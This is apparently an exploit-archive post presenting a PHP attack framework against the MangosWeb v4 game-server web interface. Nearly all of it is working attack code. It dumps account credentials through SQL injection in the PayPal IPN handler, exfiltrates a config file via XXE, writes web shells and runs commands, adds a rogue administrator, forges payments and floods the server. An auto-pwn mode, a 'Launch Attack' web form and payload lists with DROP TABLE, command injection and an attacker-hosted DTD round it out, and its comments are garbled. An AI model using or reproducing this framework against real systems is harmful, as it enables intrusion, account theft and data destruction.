=============================================================================================================================================
| # Title MaNGOSWeb 4.0.6 Multi-Exploit Framework
=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
[+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface.
[+] Core Components :
Multi-Vector Attack Framework
SQL Injection exploitation via PayPal IPN
XXE (XML External Entity) attacks via RSS feed
File Write vulnerabilities leading to RCE
Host Header Injection for SSRF/phishing
CSRF (Cross-Site Request Forgery) attacks
DoS (Denial of Service) testing
[+] POC :
<?php
/*
===================================================
Author: indoushka
Target: MangosWeb v4 (PayPal IPN & RSS)
Usage: php exploit.php http://target.com
===================================================
*/
class MangosWebExploit {
private $target;
private $base_url;
private $results = [];
private $session;
public function __construct($url) {
$this->target = rtrim($url, '/');
$this->base_url = $this->target;
$this->session = curl_init();
// ??????? cURL
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
echo "===========================================\n";
echo "MangosWeb v4 Exploitation Framework Started\n";
echo "Target: {$this->target}\n";
echo "===========================================\n\n";
}
// 1. ?????? ????????
public function discover_paths() {
echo "[*] Scanning for vulnerable endpoints...\n";
$endpoints = [
'/paypal_ipn.php',
'/rss.php',
'/index.php',
'/admin/',
'/core/cache/rss/news.xml',
'/config/config-protected.php',
'/install/',
'/donate.php'
];
foreach ($endpoints as $endpoint) {
$url = $this->target . $endpoint;
curl_setopt($this->session, CURLOPT_URL, $url);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Found: {$endpoint}\n";
$this->results['endpoints'][$endpoint] = true;
}
}
return $this->results['endpoints'];
}
// 2. ??????? PayPal IPN SQL Injection
public function exploit_paypal_sqli() {
echo "\n[*] Exploiting PayPal IPN SQL Injection...\n";
$payloads = [
// ??????? ??????? ????? ????????
"1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info",
// ??????? ?????
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables",
// ??????? ?????
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns",
// ???? ?????? ??????????
"1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts"
];
$ipn_url = $this->target . '/paypal_ipn.php';
foreach ($payloads as $payload => $type) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'VIP Package --- Account: admin(#1)',
'item_number' => '1',
'payer_email' => '
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => '100.00',
'custom' => 'exploit'
];
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'X-Forwarded-For: 173.0.82.126' // IP PayPal
]
]);
$response = curl_exec($this->session);
if (strlen($response) > 100) {
echo "[+] SQL Injection successful for: {$type}\n";
// ??? ???????
$filename = "sqli_result_{$type}.txt";
file_put_contents($filename, $response);
echo " [*] Saved to: {$filename}\n";
// ????? ???????? ????????
$this->parse_sqli_results($response, $type);
}
}
}
// 3. ??????? XXE ?? RSS
public function exploit_rss_xxe() {
echo "\n[*] Exploiting RSS XXE Vulnerability...\n";
// ????? ??? DTD ???
$dtd_content = '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=config/config-protected.php">
<!ENTITY % param "<!ENTITY % exfil SYSTEM \'http://' . $_SERVER['HTTP_HOST'] . '/exfil?data=%file;\'>">
%param;';
// ??? ????? ??????
file_put_contents('xxe.dtd', $dtd_content);
// XXE Payload
$xxe_payload = '<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://' . $_SERVER['HTTP_HOST'] . '/xxe.dtd">
%remote;
%exfil;
]>
<test>XXE Test</test>';
// ?????? ??? XXE ??? ????? ????????
$payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- ";
$post_data = [
'txn_id' => 'xxe_inject',
'item_name' => 'XXE Test --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
// ????? ???? ???????
$this->start_exfiltration_server();
// ????? RSS ?????? XXE
$rss_url = $this->target . '/rss.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false
]);
$rss_response = curl_exec($this->session);
if (strpos($rss_response, 'PD9waHA') !== false) {
echo "[+] XXE Successful! Config file exfiltrated.\n";
}
}
// 4. RCE via File Write
public function exploit_file_write_rce() {
echo "\n[*] Attempting RCE via File Write...\n";
$php_shell = base64_encode('<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>');
$payloads = [
// ????? shell ??? SELECT INTO OUTFILE
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php system(\$_GET[cmd]); ?>',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -",
// ????? shell ?? ???? RSS
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php eval(\$_POST[a]); ?>',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -"
];
foreach ($payloads as $index => $payload) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'RCE Shell --- Account: admin(#1)',
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[.] Attempted RCE payload {$index}\n";
// ?????? ?????? ????
$shell_urls = [
$this->target . '/shell.php?cmd=id',
$this->target . '/core/cache/rss/shell.php',
$this->target . '/core/cache/rss/news.xml'
];
foreach ($shell_urls as $shell_url) {
curl_setopt_array($this->session, [
CURLOPT_URL => $shell_url,
CURLOPT_POST => false
]);
$shell_test = curl_exec($this->session);
if (strpos($shell_test, 'uid=') !== false ||
strpos($shell_test, 'www-data') !== false) {
echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n";
// ????? ?????
$commands = [
'whoami',
'pwd',
'ls -la',
'cat /etc/passwd'
];
foreach ($commands as $cmd) {
$cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd);
curl_setopt($this->session, CURLOPT_URL, $cmd_url);
$result = curl_exec($this->session);
echo "\n[Command]: {$cmd}\n";
echo "[Result]: " . substr($result, 0, 500) . "\n";
}
return true;
}
}
}
return false;
}
// 5. Host Header Injection ?? RSS
public function exploit_host_injection() {
echo "\n[*] Exploiting Host Header Injection...\n";
$malicious_headers = [
'Host: evil.com',
'Host: 127.0.0.1:3306',
'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata
'Host: localhost:22',
'X-Forwarded-Host: internal.admin.panel'
];
$rss_url = $this->target . '/rss.php';
foreach ($malicious_headers as $header) {
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false,
CURLOPT_HTTPHEADER => [$header]
]);
$response = curl_exec($this->session);
if (strpos($response, 'evil.com') !== false ||
strpos($response, '127.0.0.1') !== false) {
echo "[+] Host Injection successful with: {$header}\n";
// ?????? SSRF
if (strpos($header, '169.254.169.254') !== false) {
echo "[!] Possible AWS Metadata exposure!\n";
}
}
}
}
// 6. CSRF Attack - ????? ???????
public function exploit_csrf($victim_account_id = 1) {
echo "\n[*] Launching CSRF Attack...\n";
for ($i = 0; $i < 3; $i++) {
$txn_id = 'CSRF' . time() . rand(1000,9999);
$post_data = [
'txn_id' => $txn_id,
'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})",
'item_number' => '999',
'payer_email' => '
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => rand(50, 500) . '.00',
'mc_currency' => 'USD',
'payment_date' => date('H:i:s M d, Y T')
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://www.paypal.com/'
]
]);
$response = curl_exec($this->session);
echo "[+] Sent fake transaction: {$txn_id}\n";
}
}
// 7. DOS Attack
public function exploit_dos() {
echo "\n[*] Testing DoS vulnerability...\n";
// ????? ??? RSS ????
$large_xml = '<?xml version="1.0"?><rss><channel>';
for ($i = 0; $i < 5000; $i++) {
$large_xml .= '<item><title>' . str_repeat('A', 1000) . '</title></item>';
}
$large_xml .= '</channel></rss>';
// ?????? ??????? ?? cache
$cache_payload = "1')); ?>" . $large_xml . "<?php //";
$post_data = [
'txn_id' => 'dos_attack',
'item_name' => 'DoS Test --- Account: admin(#1)',
'item_number' => $cache_payload,
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
curl_exec($this->session);
// ????? ????? ?????? ???????? ???????
$rss_url = $this->target . '/rss.php';
$start_time = microtime(true);
for ($i = 0; $i < 10; $i++) {
curl_setopt($this->session, CURLOPT_URL, $rss_url);
curl_exec($this->session);
echo ".";
}
$total_time = microtime(true) - $start_time;
echo "\n[+] DoS test completed in {$total_time} seconds\n";
if ($total_time > 5) {
echo "[!] Server is vulnerable to DoS attacks\n";
}
}
// 8. ????? ?????? ????
public function add_admin_user() {
echo "\n[*] Adding admin user to database...\n";
$username = 'hacker_' . rand(1000,9999);
$password = md5('Password123!');
$email = 'hacker' . rand(100,999) . '@evil.com';
$payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- ";
$post_data = [
'txn_id' => 'add_admin',
'item_name' => 'Add User --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[+] Admin user added:\n";
echo " Username: {$username}\n";
echo " Password: Password123!\n";
echo " Email: {$email}\n";
echo " GM Level: 3 (Administrator)\n";
}
// 9. ???? ??????
public function steal_accounts() {
echo "\n[*] Stealing user accounts...\n";
$payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -";
$post_data = [
'txn_id' => $payload,
'item_name' => 'Steal Accounts --- Account: admin(#1)',
'payer_email' => '
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) {
echo "[+] Stolen Accounts:\n";
$accounts_file = 'stolen_accounts.txt';
$file_content = "Stolen Accounts from {$this->target}\n";
$file_content .= "====================================\n\n";
for ($i = 0; $i < count($matches[0]); $i++) {
$username = $matches[1][$i];
$password = $matches[2][$i];
$email = $matches[3][$i];
$gmlevel = $matches[4][$i];
echo " {$username} : {$password} : {$email} (GM: {$gmlevel})\n";
$file_content .= "Username: {$username}\n";
$file_content .= "Password: {$password}\n";
$file_content .= "Email: {$email}\n";
$file_content .= "GM Level: {$gmlevel}\n";
$file_content .= "---\n";
}
file_put_contents($accounts_file, $file_content);
echo "\n[+] Accounts saved to: {$accounts_file}\n";
}
}
// 10. Auto Pwn - ???? ??????? ????????
public function auto_pwn() {
echo "\n[*] Starting AUTO-PWN sequence...\n";
$steps = [
'discover_paths',
'exploit_paypal_sqli',
'steal_accounts',
'add_admin_user',
'exploit_rss_xxe',
'exploit_host_injection',
'exploit_file_write_rce',
'exploit_csrf',
'exploit_dos'
];
foreach ($steps as $step) {
echo "\n[=== Step: {$step} ===]\n";
try {
$this->$step();
sleep(2); // ????? ??? ???????
} catch (Exception $e) {
echo "[!] Error in {$step}: " . $e->getMessage() . "\n";
}
}
echo "\n========================================\n";
echo "[?] AUTO-PWN COMPLETED SUCCESSFULLY!\n";
echo "========================================\n";
// ??? ??????? ????????
$this->generate_report();
}
// ????? ??????
private function parse_sqli_results($response, $type) {
$patterns = [
'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/',
'tables' => '/(mw_[a-z_]+)/',
'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/'
];
foreach ($patterns as $pattern_type => $pattern) {
if (preg_match_all($pattern, $response, $matches)) {
echo " [*] Found {$pattern_type}: " . count($matches[0]) . " items\n";
}
}
}
private function start_exfiltration_server() {
// ??? ???? ???? ???????? ????????
$port = 8888;
echo "[*] Starting exfiltration server on port {$port}...\n";
// ???? ????? ??? ?? thread ?????
// ??? ???? ????
$cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &";
exec($cmd);
}
private function generate_report() {
$report = "MangosWeb v4 Exploitation Report\n";
$report .= "Generated: " . date('Y-m-d H:i:s') . "\n";
$report .= "Target: {$this->target}\n";
$report .= "=====================================\n\n";
$report .= "Vulnerabilities Found:\n";
$report .= "1. SQL Injection (Critical)\n";
$report .= "2. XXE Injection (Critical)\n";
$report .= "3. RCE via File Write (Critical)\n";
$report .= "4. Host Header Injection (High)\n";
$report .= "5. CSRF (Medium)\n";
$report .= "6. DoS (Medium)\n\n";
$report .= "Files Created:\n";
$files = glob('*.txt');
foreach ($files as $file) {
$report .= "- {$file}\n";
}
file_put_contents('exploitation_report.txt', $report);
echo "[+] Report saved to: exploitation_report.txt\n";
}
public function __destruct() {
curl_close($this->session);
}
}
// ????? ????????
if (php_sapi_name() === 'cli') {
if ($argc < 2) {
echo "Usage: php exploit.php http://target.com [mode]\n";
echo "Modes:\n";
echo " auto - Full auto exploitation (default)\n";
echo " sql - SQL Injection only\n";
echo " rce - RCE attempts only\n";
echo " csrf - CSRF attacks only\n";
exit(1);
}
$target = $argv[1];
$mode = $argv[2] ?? 'auto';
$exploit = new MangosWebExploit($target);
switch ($mode) {
case 'sql':
$exploit->exploit_paypal_sqli();
$exploit->steal_accounts();
break;
case 'rce':
$exploit->exploit_file_write_rce();
break;
case 'csrf':
$exploit->exploit_csrf();
break;
case 'dos':
$exploit->exploit_dos();
break;
case 'auto':
default:
$exploit->auto_pwn();
break;
}
} else {
// ????? ???
echo '<!DOCTYPE html>
<html>
<head>
<title>MangosWeb v4 Exploit</title>
<style>
body { font-family: Arial; margin: 20px; }
.container { max-width: 800px; margin: auto; }
input, select { padding: 8px; margin: 5px; }
button { background: #d00; color: white; padding: 10px 20px; border: none; cursor: pointer; }
.result { background: #f5f5f5; padding: 15px; margin: 10px 0; }
</style>
</head>
<body>
<div class="container">
<h2>MangosWeb v4 Exploitation Tool</h2>
<form method="POST">
<input type="url" name="target" placeholder="http://target.com" size="50" required>
<select name="mode">
<option value="auto">Auto Pwn</option>
<option value="sql">SQL Injection</option>
<option value="rce">Remote Code Execution</option>
<option value="csrf">CSRF Attack</option>
<option value="dos">DoS Test</option>
</select>
<button type="submit">Launch Attack</button>
</form>';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
echo '<div class="result"><pre>';
ob_start();
$exploit = new MangosWebExploit($_POST['target']);
switch ($_POST['mode']) {
case 'sql':
$exploit->exploit_paypal_sqli();
$exploit->steal_accounts();
break;
case 'rce':
$exploit->exploit_file_write_rce();
break;
case 'csrf':
$exploit->exploit_csrf();
break;
case 'dos':
$exploit->exploit_dos();
break;
default:
$exploit->auto_pwn();
}
$output = ob_get_clean();
echo htmlspecialchars($output);
echo '</pre></div>';
}
echo '</div></body></html>';
}
?>
************** # server_config.py**************
# server_config.py
EXPLOIT_CONFIG = {
'target': 'http://victim.com',
'timeout': 30,
'threads': 5,
'payloads_file': 'payloads.txt',
'output_dir': 'results',
'sql_payloads': [
"' UNION SELECT @@version --",
"' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --",
"'); DROP TABLE mw_accounts; --"
],
'xxe_payloads': [
'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % remote SYSTEM "http://ATTACKER/xxe.dtd">%remote;]>'
]
}
**************************************
payloads.txt
-- SQL Injection Payloads
' OR '1'='1
' UNION SELECT NULL,NULL,NULL,NULL
'); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
-- File Path Traversal
../../../../etc/passwd
../config.php
/var/www/html/config.php
C:\Windows\System32\drivers\etc\hosts
-- Command Injection
;id;
| whoami
`cat /etc/passwd`
$(uname -a)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================